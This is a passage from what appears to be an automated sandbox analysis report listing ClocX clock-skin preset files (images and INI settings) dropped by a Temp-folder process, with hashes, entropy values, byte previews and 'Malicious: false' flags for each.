Preview:	.PNG........IHDR.............,......pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..i.IDATx.b...?.(......b...Q@... .. @.JJJ.0..`......}..?.......8..%%I...N!...%._K.#....'4.....%.8,A....(..p....ME.....,.%".......9........C....g.......=(........:.....0..$.....G.......p.p....p ...@..m......@r..N.`....RQ..G5.Ep.&.8...4N..p.DIJ..2.%..yI...py...eG..o}..y=......V.GKKILQ....A.J.....bV..H}...(.q..N.%...(.LX...\|...$TLSS.a...NZ....g..<...To...X...0.....41.K.P..N\.....N............R.. ....{>LJ$..b..%...G..$.g...+...;v.Rz.........>0.5%@%.(.9.8...\x0@..$.'...F:(...{....h......X...'..H.P....@.....E.D..I....9.....h.....ne....>\|.qw(Wk...-C$.A .n.h..4z..i5z.Lj.I....z.(;..y.*.SjH.) ...5....df.l. b..........3=...w.M.x..B........J3rN....... ...I..H.N6..H.5.^:?...t.....W.1....l....%.;.J.....c$)...DP..E4......T;?..u.X.pr..9..&.H."+`..JL.t.j.............$8A........P..w...'p...A.v.sH...w.8.r..@s8A. ..&0...V.X.c.q.I....J+..HK..G7..@........b?.%Hb.s`

C:\Program Files (x86)\ClocX\Presets\LongClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 122 x 104 x 24, resolution 2834 x 2834 px/m, cbSize 38328, bits offset 54
Category:	dropped
Size (bytes):	38328
Entropy (8bit):	6.400177731055891
Encrypted:	false
SSDEEP:	768:+SY8aR+Fh1mCcbLhN5PJsmU9exbK1UUWkOuRuaUivtgc:6V2zmCcbzPsmZhK5bRuitx
MD5:	224D809351EAC5981A93D5F78F325A14
SHA1:	A28AF5DF1908B2527E827931849D7891F6B2E508
SHA-256:	0A74FC0FFA8DFF0D8A080C3306CA98707BE271E02458879EA533CCA5BF43C3D8
SHA-512:	05741BB2F5C06A94D07106E86AFD5817F9380D6EC52D5570B41A659AC3BEDF1C1241FA67FFAF868E9B128532B334EFA682947CCB5DB412F0F23F8F6805E04C95
Malicious:	false
Preview:	BM........6...(...z...h..............................................................................................................................................................................................{{{xxxuuusssqqqpppnnnnnnnnnnnnpppqqqsssuuuxxx{{{..............................................................................................................................................................................................................................................................................................................xxxsssojgof_qc\scZye[}g[.j].k^.p_.p^.r_.s_.s_.r_.p^.p^.l[.j[~hZxeYscYoc[ne_ojgsssxxx.............................................................................................................................................................................................................................................................................}}}uuuqkgrf^ueX{fV.fT.q^.ra.sc.ue.vh.wk.ym.zk.}m.}n.xi.wh.\|m.wh.te.}n.wh.vg.uf.te.rc

C:\Program Files (x86)\ClocX\Presets\MClkhrHand.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 82 x 29, 8-bit/color RGB, interlaced
Category:	dropped
Size (bytes):	4342
Entropy (8bit):	7.941835201767031
Encrypted:	false
SSDEEP:	96:E6/uudQD0HcoVjwpVP8mJtJRIyi1vjnwMC1DyaebT1arybARHyAgWp:EYdd7VjwpBnnIyWvjnp4+a+T1arQAdyY
MD5:	1807D18C930D5B762C02DFA33439D019
SHA1:	7F542E821A9C6F7AF1A1B7120C4FFF8DC29E6FBD
SHA-256:	D951BB6D6D6FF4D0B15E3B9C803BB51C8EB10CE976517A7DC97F8636C7E24EEC
SHA-512:	D2D005DD7AB77D40C402883FDC3B49930844E1704028417ACD544DF6EC85290928D38AAA7964F5B7E083AA7F88BF71A65BF83B59F505BC5306F0663FED60E9D8
Malicious:	false
Preview:	.PNG........IHDR...R..........G......tRNS.........;....pHYs..........&.?....tEXtComment.........IDATx..X.wTe...{..}..TB..@.VEd... . .@..E..b.e...BH !!dOH.....P.....i....s...........I%............"?Yg....F..D....`.s......j..~.br!D.A.).i......xF0..}.j...`....f.2 r.m.3;..NJL.P;c.3b.X<....dj...{...pa.4.g..'4.;lR. ....0..H.M......_....}<9S.k.T...F......$.B(.F.'.?S.... ...q..M.*(`h.&-c..@w.r../4K._.....~2..[.tU.CF..f.....6]6.1...jn../....}.}...)x..bN...I6..8..f.1...?.../v...1...O...FCQ.l.z.\..y...G.^.{"....d(.O........]q....W<....-.&..UNRD..8Qe.Loh..MP).L..AA>.........L........].U-Y.........A. v.M.,....y..b].Gs.r.....0....k."...xX(k..#....a.o,~tj.....^.+....-T.8@...N.]../i...Hg.z9.B...:?p.....~.;X3..FA.`....L..8....N....r..$2..y......2.V. .R}.......iu$..........."...ND.....kf..k....}...o<..J%R.H<....[V.!.KDf.V.%.q....A..Q.o.l......`c....ei...h..O..2.?.2.<K....tI.d.I4.nTL..)..H.Q2i.&....d7.+..q......Q.I..K/.......R..[7Q.....u.ggc(.n.bV-.y.......F..nf

C:\Program Files (x86)\ClocX\Presets\MClkminHand.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 99 x 29, 8-bit/color RGB, interlaced
Category:	dropped
Size (bytes):	4186
Entropy (8bit):	7.931723634103746
Encrypted:	false
SSDEEP:	96:6fLdlazsuvgUltX4xgm/HZe0lPHtSPwZLoc:6fHarvgUSgmA0N847
MD5:	7293D9082295616A46631E18065E8723
SHA1:	B67481A1D09E19D91FC4BAD975A2490545660570
SHA-256:	667A8F4C9F37BADFFBDD7708919BD6133A4F0C9B4599B3382A0B8478B17203AE
SHA-512:	8805516F149E8094E1A0BF0A406E9AFE643FF10D5A2119592FC1138296B4BD488C030AD83B0915489A0BB8DDA7C01B074B724AEA8CA665FE16122C72AC26DA26
Malicious:	false
Preview:	.PNG........IHDR...c.........Fvu.....tRNS.........;....pHYs..........&.?....tEXtComment.........IDATx..Y.{.E........'.dX.(...(.]T......AH@.bX>.A...H 3..%.$3....I.~~?....t.'.\...x..S.&S]}..9.y..`=@.v.q.[?...O.._-.@... .V.....o..DfG&,.\|}cS....:68..p...x.A.b........d..}.e.}.}...F.......n.s.~=X.....iC"..a....y.i._\.oc...5.S.....%.0D&...\>..!.<0)...0..s..?7x6.(c...LRt............a...x]......#...2'..0..h?.\|...)"..]g.b...N.c9.^;...fF3.Q./..ju.......4..+2.2...r....p.e.X.p..3n.{....ug;.{.........2G..<Y `...._.2..{].~U......Y.l...AZ.. C..I7.~..........(. 0.&.".J........C."@..8.1N\C.,.G..7..7.=.nw/YV.F..jM....k^..Y.}.q.......o8...;....S=.........-4>&.h......p.f0.C....O.~../.X...;.#. G.=L@..&..%.G..w......'.(...Fe.H...n...}.^............W...\R....k.e.."=HC.d.P.A.v.x..7.U+./.K.w..R.+V.9.;Dvuh.9^.N.. M.a.(....m@...O.......cv(..h^..i..Y.z........v,a..v......?c.D<.Hdb...c}.:.]......b........4..Z4r..Hf..<.X.<A$.f....4....C.6A.a........^.U......W..4QWUCS....D

C:\Program Files (x86)\ClocX\Presets\Metalluhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15980
Entropy (8bit):	7.977328361379866
Encrypted:	false
SSDEEP:	384:/Uyi6ZuPdB7WF2ZylcQ25aSjZk9yeXi+FAvblFmLo0h6aGZRKdhVHeAnlF:/+6ZulBISIlyYKzmLD4aGDKrEAnj
MD5:	B7D40312C4D52BE2DCDF3B26E28C4225
SHA1:	694A2A386BC5AE7627EB643C16141C826862BA5A
SHA-256:	1E2467EA0BC4A8DC323A6B61F82165A6A52AF8D12245B7B7441FF7C8E4D40ECD
SHA-512:	E3629BAF278481FD9207AB2BE95D692E9A42ADB0E376FB6625653ADB98694934513F75910DCE21E42A7C364B3B69713BA7DC7D4418658D74520F3CA92C8B7B54
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs...:...:.d.W... .IDATx..YP.{z.g9I.r..d;..."5SS..R..\$.A......W6Eq9.(......s@..........( ...4....<.P{.L.j.f..O_<.........{.....G....pY..p....C.....8.p....C.....8.p....C.....8.p....C.....8.p....C.....8..}...~>1.(.....7<...7...3...=...9........'..mg....oZ.j_5..x..VS.:...-.].@.e...............>.....j...U..3.....g.....xT.E.F..^._QO^..n.>.F.=.d...^D....%.s..e..SH..Ci......../f..X\.\|.j...z..!.........<w.ex..et..1.h.2/.96O..<}3....].o.....C.V.M..m..ct...q.z.x.:..w<.o.......HHN.X.E"..%.d.i7...Z;.......XWW.fz~.yz.qj.....:F.w..?.4[&{....]ax....2C...M..92IK..M.c....7...!.:.y.9HC. /Z..n...\|.CUm...jH/. 9.6..n..m.q.W.sw........89=...].OZ........}......../[.&.Z.gs....[..tL..;......f...e.sV..9.z...o..A.%.j(.......e......+.>h..Q=%O^q..5./.p...J........<x.L..z.2.9..Hx...$.....n..>......w.>..VVV?...<.>0^..wl.M...{.B....s.YV...26.L..8/..)...;.O.]......xFA.s..._...Gu.=.....<zA.............<ml.yS..M]<~....m<y.N..n.7.P..O..8.#....S.1..

C:\Program Files (x86)\ClocX\Presets\MickeyClock.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	678
Entropy (8bit):	4.917267489832909
Encrypted:	false
SSDEEP:	12:a4EqmYLrrcR5pjpJrtOp0BP5oHy4yjQp2i0dO92HOFLlTYQBSwcz:BEQrm5b7Ouh5obykcix4OFFLi
MD5:	11E9EFE0037DA4F0FE989AB84830BA3D
SHA1:	CA50EC23FCCE716D006A4BF0BCB12D24B337154B
SHA-256:	D0DF0CE0E36DE4ECC1D6B132CCCBA792033D86CB8BB5C93C8BD9998BB705C56F
SHA-512:	2BE02B5476830EFB44F4FEC00FCF4095608BB3AA9C98FCAEEE2D90404B2FDC7ABE6742E21C9EDA56F63F57A66EBC0566391986A1E069DC5DD34532BBFE3BF97E
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x00ff00 ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x201010.;color of AM/PM indicator....HourPNG=MClkhrHand.hpng..HourPNGCenterDist=33....MinutePNG=MClkminHand.hpng..MinutePNGCenterDist=43........SecondColor=0x555555 ;color of second hand..SecondLength=100 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=2 ;width of second hand......CenterX=122 ;center point's X (default image_width / 2)..CenterY=123 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\MickeyClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 246 x 247, 8-bit/color RGB, interlaced
Category:	dropped
Size (bytes):	99813
Entropy (8bit):	7.9960328241893714
Encrypted:	true
SSDEEP:	1536:assTzTBUqQ3hK+9T/7NSOM0t5U7mn89Rby4MDS2NK3J9TvU68z/sa6xlcEyEPvTd:a3tUqKNSOMCDKbW+gU/xPvY1TRSa0
MD5:	268519BA3D99BB1A48FC6A044EB1984C
SHA1:	D5DBF25990D0D4B7254C31690569B76C7C6A95C0
SHA-256:	72645CB08A9D89EE34896521DFF7CDD0AC79536C72296949D393A483D37B2CDC
SHA-512:	D4D9AA8E54BF2A9D55E4C69A728F7D535ACAA576782E6A37F2E2198768F06A6A31536E04C488F3795E8C38AB8EC4003BE26094A1DE89BB76BAC382A91603A4CD
Malicious:	false
Preview:	.PNG........IHDR..............+......tRNS.........;....pHYs..........&.?....tEXtComment....... .IDATx....TU.>>$Q.8.s........0.y....b........k$...Tr........o.0..:.g.].....<..3.=..S.....i_k.....!...Y[w.Z....U...w6j....5....u]x..b.Kx..'k.CV.y./.z6...f.u<...b....4m..!l....\|..l.%F..[.8B.?...6.......YcG...q..#..F.M.......(....=t..\|.......&.d.V..A3.>..../X..u..j..u..^!.".).:Z7s..n.>c....[W..[.q.C.dY3H.....sdY......wn[w....^..H..^[S.7!..<...1l....]...........[.i.'...B>.?8..'.se#mY..'..l...-...+.8......q.l.X..b..G,....v..\|* ...l......J./..{..e9v......^..*D.<.......#.!d...A.....YK>.5...u1g.... .=<...n!..Y.Z.SV..k.b.M..pg....?)..BVz .W........!n..j..1_...p.......2q.NQ6.P)/...,W....^.>;.+...K..`!....l.^=.........:S.=c.4K...........&<.1....g...]k......%Fd,R.K..U.W..4.4. J....W.FlV.!1f..]G.A.l:\|D`@Or./H#.w..grK..\.X..-....yYY.V.R....PM.^.I1\|....^.2f...\..Z.9...$..)..%.....Kw.u.4mba.c.K..-....{.r...R.TgB.\.cA/=\....+.i.B..U.V.g...'...;..N.....

C:\Program Files (x86)\ClocX\Presets\MickeyMouse.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	680
Entropy (8bit):	4.892030328377304
Encrypted:	false
SSDEEP:	12:a4EqmYLrrcR5pjpJrtOp0KPvE0BHy5W2iWO92GbblTYQJbwcz:BEQrm5b7Ou0v/ONifpVJci
MD5:	A32B0A69A50AAAF0199500937B815EA7
SHA1:	F6E6D47D60107184DEEAB69A0B3BA0A7352063AB
SHA-256:	B39F51A64048FE26B41831D4DBB612965B967D9AA0F01D579038F67728508B8B
SHA-512:	FC35567C00F18BD886B42A4D0D447D99C7999696E22ABF657D929417B5EFB1F64B805F8144080473AF4E74577FAECCB9559F35808AB68F4D41CA0FB9C444A389
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x00ff00 ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x201010.;color of AM/PM indicator....HourPNG=MMousehrHand.hpng..HourPNGCenterDist=15....MinutePNG=MMouseminHand.hpng..MinutePNGCenterDist=21........SecondColor=0x444444 ;color of second hand..SecondLength=52 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand......CenterX=62 ;center point's X (default image_width / 2)..CenterY=61 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\MickeyMouse.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 123 x 124, 8-bit/color RGB, interlaced
Category:	dropped
Size (bytes):	28133
Entropy (8bit):	7.9887437039825295
Encrypted:	false
SSDEEP:	768:xXTnuvx75M3cPMaaI5SG58+a3/zRHC8nDawy6AXe68Dp:IvJ5kGeI5qPzRwhXe6E
MD5:	138B8FBF86D45154F336D82B65F64318
SHA1:	7EF479F3143CE1981D5B7586C770A5BEFE2F4C39
SHA-256:	43E465AE6CB6BD2CE7D58ED2082AC8598437B40B77B6ADE04B89C39EC1E82001
SHA-512:	DACA16170627397B20D7FEA20E52743FE9395FB8AF894EBB5AA6505C27979BDA1E6DD44A31695E436A165EE79CD2222F7483A24FE8AB9DF7AD8A3D4F9BB9F7F7
Malicious:	false
Preview:	.PNG........IHDR...{...\|.......h.....tRNS.........;....pHYs..........&.?....tEXtComment....... .IDATx..}.xTU.w(v..Iv7.....i"...P@,`Gz.JG.. Ho.-...N..m{.........+....o...q.w.93..7...^99....k.6..._.....^..q.fQ.3....7..f.[/...\Z.G....>.0d.y...Y.5..:.[..)....x.S.K..8^.P)ht.....g.x.b .g.g].....(p.^..k..L"\|7...t.~O{....\.o..........y...&..${.7..N,..^....x..G.KDef].s#.F!P...3K......e...M..u.._.>=!L.R.jW/..o.N8S..E..'.O.....Ha....u.......b.t...u@..,.{0........&.."..d>.$.....k.QY@.U.'.+.L.Y.7..m...D.....s.p.....x..f!......wr.{-.&.....;f@....D~...k`V........V\|..g..x".Q...pM..~....4..F.M.n]8.....u6._5{.A... .RF.M......S.s[.p....V.......E....L.E..qi.ve....,.G..q.k........."riX*a.5,WZ.W.qi.].F1....z...^..........o..6}.......!.;.x.d.?...r6...... 8s.'X;........Z..Pym.O....y...,..D...k..9..D:h.SW.o...g....d...=fq.S..Gs.A....p..[..,J......^....5..j../.=.0...k..".......D.en..n.....?d.9.-.8}tB.=......En.D-.G...>..g....+...[...8.-.x..7m.[...{.nYxQ...k

C:\Program Files (x86)\ClocX\Presets\MilkClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 117 x 119 x 24, resolution 2834 x 2834 px/m, cbSize 41944, bits offset 54
Category:	dropped
Size (bytes):	41944
Entropy (8bit):	4.502988081517253
Encrypted:	false
SSDEEP:	384:48oCgzHI3a+orRHK546WiWERXIyX9mNobpDbWvwpOwxggScDYe9bahZ6biQP7l4d:nvarRqN9pkW2QP7+4j4tWldZU
MD5:	C429424DACB9E99C03E1C9AA0A43EDAC
SHA1:	8B46C8CEA93BB189D7BB658C2CB919C9BB5E73EC
SHA-256:	7759C1C207EACEA3C0D807F973AFEE0431763194CF965AF6D8A12B51E08269F0
SHA-512:	1EE9C13C2466AC1443E5CD0749B59071BDA105E61CC48558358EB7AC14700C7D0A3EB1804D11226C923CAF720813191F24EC4BE0E1494A07EFB230B0A4C15F8A
Malicious:	false
Preview:	BM.......6...(...u...w.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\MilkClock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	21359
Entropy (8bit):	7.901413955608492
Encrypted:	false
SSDEEP:	384:5vztSCNV9xlvtlOzk3VB0/V+aWs9AGCexm2gRLfInmwzGCmTi5cUuYR00QQK1E50:TNV9vVlOu/0/7ZAGCexmdRLgmwzOikYm
MD5:	47F1370D7FF57B3FBB2279BEDB6B8AAB
SHA1:	4918369DB575B65C1FC5429E4BDFB56B1318EF71
SHA-256:	06A1292FF82C497E9238734AEF77C2F953371D5910A3AF93289F6C2820508428
SHA-512:	519CA59DB91E11C247E585511194D436401BE409EE65CBAC2C6B6EA9DA5AFCB80BA400B1CC98EBB24B4DFECECB679807BE2798B4CC2D3245B02C3B9667B75C65
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..R.IDATx.b...?.(... .X....^...J.....LLL.06.D.S...........;... .7ep.0.BQ@m...)....p...1m.B..>.......Zk4o....B...;....0gb....)[NxK.1.. (.r...T...1Z.U...%.5e.. .CQ[.a`....V.`...1.x..../.^.[..\|.dz(.R..:c.<...b....G..C....Pb.....K.5S/....foG.:FG.\.,.B..R..{a ........a.. .F...2..x..x.)c.V.U..;D?.@...]F...{.C...L)....u....D..3#.U..2...<...P..8iP..........m.wf}dn.\kM..7....X.7......}...$..+E8.........2.....R...0.6.T.n...?z. XZ."\......P .......@..40..r......d5P.Xx.........kc.1......,...VWk...k.\|`P.._..$j...qI..Dy(T.L.s.<.4..<.g.....].@p...{l..~._.0[E)..0t...).......z..5...........`......... ...0.sN....9..ZT..k.=.."\|.M..vS........jZ....O..o.f.+..s.1..I.S....2.,.9..t.\|r. ".E)..U..%....0.D..hK.7.z....\o..\t.P.".....#t..$,.g....Zr...N.X.{.....Vuc...z.;. ........,[`.^&Q...I]..H..O[x.d.iXxF..S......Q*...<...B........a\|Ln..O.u.dk.i...........O.

C:\Program Files (x86)\ClocX\Presets\Naranja.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	25596
Entropy (8bit):	7.895086709174528
Encrypted:	false
SSDEEP:	384:izRtQkbn+VtynIsPHlUGcCv5OcTfDs/YipSwz+H0lco7iHTA6ve+O4AypF21w:uLQkbn5Pn5OcavTzZlc1H06mn4LIw
MD5:	6E26841542A025BB86B2BEA057B57704
SHA1:	CE1A326FB113AC7B0F5A5850F6EFAAF35637C6ED
SHA-256:	FEB312B60BCF8CB4A74F95639CCA0FC8C0AD71567EBD3A980D868671E5A0C105
SHA-512:	C0F4E46D6952DBA10CCCF6337C701AA75EEE8AB4A48A30C66190561AB6ED040EEC282CD79B20B4833101C3B702EA715243092B47DB80707015A8E880A7C8E33D
Malicious:	false
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..crIDATx.b...?.(..C.....h.......h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!....e4....."L....@."..102..i) ..bQ ..b~ ..bN f.j.....+.....@..._..3...O..# .....n..7.FC.8..@...q.&s.}`"..2u.X..5.X..xT..-..... ...W....N..8....@..&`....L..@.......#....Jl..i;......w...........O.M."..j..v..g...p'LF.R..R.-^....G..! >Xw.......4".00.... .Lc.@..3.a&VFF...{.`M..b{..n..&..#-....[v+..A..Z..4...{..y...60tkY.\..+..p..0.\.a.I.LqK:X2=......7...B.@fKd......b.$/ I..d.0..d..F..W.a.w=..........E...u.ij...N+.:.8......_.O..JE.....)..}..&ZP. .. .. .3.bi.2..-..;.......<.?..f....&ZA.fp..&j.f0Mr...wP".../........./.3\|z.................?......y#...H..&...9~..h.&``...&.P 3.....-Jz.r........OL.AXA.AX^.A....d.X.9....)H?8..*....n...7...>>.....m....0.......0............'.}@...[.L.o.c<...K.....L..@f..;.J..@...d.V.......

C:\Program Files (x86)\ClocX\Presets\Negro.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	4.794122875050788
Encrypted:	false
SSDEEP:	24:BEGrGXz5lrUBRyTOLX01rfPkp+dGm8JiX33NPeibQ0Wd9iBxLuQI:B1qFlQmiEdGmxtPBQJTiBxLvI
MD5:	8F3B521E705B5627F46E7B0013FF6C32
SHA1:	022116186DBDE488C76A3576313B6A85E8D867E2
SHA-256:	BC8D35BFB7F76801FC490B94CCC9F7EE56ED46FFBAEC4C6A2863360A11905685
SHA-512:	CF042E18EC79DEF94ADEFAE65AD05F7E74F980BDF94D84DBF57CA07C03266CB5F2513578DF1F4BB86233A309A52988C872C7A75994C004AF2C1958586E276537
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFFFF0 ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=12 ;size of AM/PM font....HourColor=0xFFFFFF ;color of hour hand..HourLength=39 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xFFFFFF ;color of minute hand..MinuteLength=59 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=63 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;CenterX=60 ;center point's X (default image_width / 2).. ;

C:\Program Files (x86)\ClocX\Presets\Negro.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15904
Entropy (8bit):	7.882124962892923
Encrypted:	false
SSDEEP:	384:+WRaK+pYK+RSwp359dz+GWW0DlS3dSX45sEHI44bkOvVYD:+saKO+Qwb9d/0DstSI5sA9D
MD5:	B2ED7E8FD0CCF0E6B45B3C47CEFA3742
SHA1:	0BC335E49A4E210A677181D3867CA1342C269B10
SHA-256:	AEA2E2C6F689C1DB7CAEC63BB7D6A1863F4A564560B0C90D145C76B9F3A2D8E3
SHA-512:	21FC75602C9C4E31D4A5BBBACFAE3A99F7E6CE8BD8BF73548142198F2BF32A0E5B3F131D19CD0C6755602A53C472E7347AC311A4F36E83EE1FF73E02BC7978B5
Malicious:	false
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..=.IDATx.b...?.(..C.....h.......h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!....O.(..P.E...FTD.....B.6Z.<..R..2p.).&...GD......=:..Q.D..i..q....+f8XL0Xpy....... ....8.-(s.....k.......:4..A.(+. .6.%.?.....hA..&....[@\|.....g`b.3.+.. .F.0"..."..k.........+#%VF:9.?R...........@..........@.....L.l.j...m.........:.#....S@\|..O..#...k..!@.....L......m...$<....O... .......H.K...=.. ....B...(9.6{.m.:)... $...........c.<......3....%..Rz...<.p..Z.c...Rb.&p.!..c..........Z+J).9#.....X... .te{.8n.pa..{.....g...a.......,..&^=b..D.... ''.....AXAA..h...@f..6##i.cP...)....8.{........?..w....'61."..4...57.f......@.6.C..%.G....+...`..%FP.)##.......*UA. u..U...e.P......G..n...._..a%4.w....@........@...C...@....@,.+..JNP..%R}}}0...d...AI....T....../^D....f.;;;..?..W.^...PM.s..y.J..]..q...p.

C:\Program Files (x86)\ClocX\Presets\Neon.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1464
Entropy (8bit):	4.842480420404331
Encrypted:	false
SSDEEP:	24:BEQrGXz5lrUNdaKy4jTORXFBA1rfLkppSPGm8eGiEw33NPeibQ0Wd9iBxLuQI:BzqFlCdf1YFuGHSPGmjtPBQJTiBxLvI
MD5:	F9DA34467004F63FA227A92A987A53A5
SHA1:	910197CEC498DC6B075C50952441666D12940D5D
SHA-256:	2A4CF56FCF8001F8D6DBAA7229CC8BB52A638058746F76F8D170BAE6FC3FAAB4
SHA-512:	B4F3B866672B429D548A10EBBB56B02A0C740A22E6407BA43C437EA7ADFEE0A649F82D7E8EA195D4B1CAA37954EA65FDE9338C89F7681660C2BAF70AC5F030A2
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0xFFFFFF.;color of AM/PM indicator..AMPMFont=Arial..AMPMFontSize=12 ;size of AM/PM font....DisableDate=0..DateColor=000000..DateFont=Arial..DateFontSize=12....HourColor=0x800000 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=4 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x800000 ;color of minute hand..MinuteLength=48 ;length of minute hand..MinuteLap=6 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x434379 ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=8 ;overlap of second hand..SecondWidth=1 ;width of second hand.... ;CenterX=60

C:\Program Files (x86)\ClocX\Presets\Neon.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	43626
Entropy (8bit):	7.986276133657454
Encrypted:	false
SSDEEP:	768:DuF0MfMQQxIK70B7sJozsmZcWbgQK5d3/6cwivjm2A6SB9Cw0ZHYec5rLQoGd6dt:qSMfMQQKKIUoYG9bgQs1yc9V69rvecpR
MD5:	87304CFA94B7A6C97C5FAD0E1D03AAEB
SHA1:	1D42F855358B308F5BA790A3E7CB4EAF2161DD0E
SHA-256:	DF2A006BDC8FC9FC01ABABA6D223099540AFE6C21D5A2AECBDF7C4C07F4FF133
SHA-512:	2E62EDF1C1D44CF0037C8580E3BB219638F1E5FAC83FD95C21EE29C75E406C135A4E6E9882FC033F4E237FAC999D901C6AAA33CE55E94D70383EDDDAF56891D5
Malicious:	false
Preview:	.PNG........IHDR.............=..2....pHYs.................gAMA....aLA.... cHRM..z0..............s;...S..<.....A.......IDATx.b...?.(........h.......h4A..a...h4A..a...h4A..a...._-+..@p..."=..8x.....}.CS......N EJ..ua...dGD..}.Z.b.]..y. .(.C.k..}?.".K..-......B.v...6...;.A@.........#C'..a......i..8.$Ib..>...r}...b...<.0....8..F.x.3...,....eYRQ.TU..iJy.S.d...i._.x. .. ..@...1.....H+....0....E.....@......................I...?..0.L.......QBB..P.{ ........II.K@..>}....../P.....@..&h,..Z........8...R...J...9~......O..<.. .....k..<.......0..&fP.F$`P....uX@l&66V...V.`./.....5tuu.........O.>=.f../_..~..3w..=.....@.......... ..g.s..SD..#d.......A..kA....s...C........>.A...b..=...p....VL)I.Q....v.:.x...\A..@.Z......F.........h..`...[.{`G.s.....d..!..~s.e..W...M.P=.@...v......@%,(.~....x.../.....h.../Hs..?.[...`.!..$.......98.Q....$...`....l...:3...g....D.O....p.%h.0....%n..>......=...;.lk_.y...P8.$....2H....h....N.j.....:A-..e...P.. ~.a\|.)A.Wv.{......{.}.m...

C:\Program Files (x86)\ClocX\Presets\NewDefault.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 119 x 120 x 24, resolution 2834 x 2834 px/m, cbSize 43256, bits offset 54
Category:	dropped
Size (bytes):	43256
Entropy (8bit):	3.318321141805908
Encrypted:	false
SSDEEP:	384:kZSPu+ghYOPL1gvlqKQJ1YTWsUtpN4GbVkAl7y07L+T9s8:cSPpgevGrC8DbCYyzZt
MD5:	816FD13D82B4DD490414E053349FA722
SHA1:	EA89DED1A0DF180277660E50ABEE02405609C830
SHA-256:	6B612912B7A557D81789C0D3EDB1FBB00B9ACD1D9F7B4BD1E689E163AA2E8182
SHA-512:	1D174F3FD8438C2FB4A59316B78962780DA217F2AAFAD2ACEF4933D5E93D6305AA2FE2E0D70BEDC6D3CCEAF248ED22F42415EBB05C8EAFED229D2337C5A3EB1C
Malicious:	false
